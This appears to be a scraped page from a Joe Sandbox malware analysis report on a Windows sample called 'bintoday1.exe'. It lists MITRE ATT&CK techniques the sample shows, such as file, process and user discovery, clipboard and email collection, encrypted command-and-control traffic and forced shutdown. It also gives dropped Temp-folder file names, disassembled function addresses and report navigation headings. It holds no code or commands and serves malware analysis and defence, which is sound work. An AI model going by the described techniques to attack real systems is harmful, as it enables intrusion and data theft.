Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report bintoday1.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\5E-50o

C:\Users\user\AppData\Local\Temp\Dalis

C:\Users\user\AppData\Local\Temp\aut76CA.tmp

C:\Users\user\AppData\Local\Temp\aut7709.tmp

C:\Users\user\AppData\Local\Temp\croc

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
bintoday1.exe

Function 00B942DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Function 00B942A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 00BD2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Function 00B92CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 00BD065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 00B9344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00B92B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Function 00B93170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Function 00BC8D45 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Function 033425B0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 00B92C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 033423B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132
fileCOMMON

Function 00C02947 Relevance: 7.8, APIs: 5, Instructions: 313
fileCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre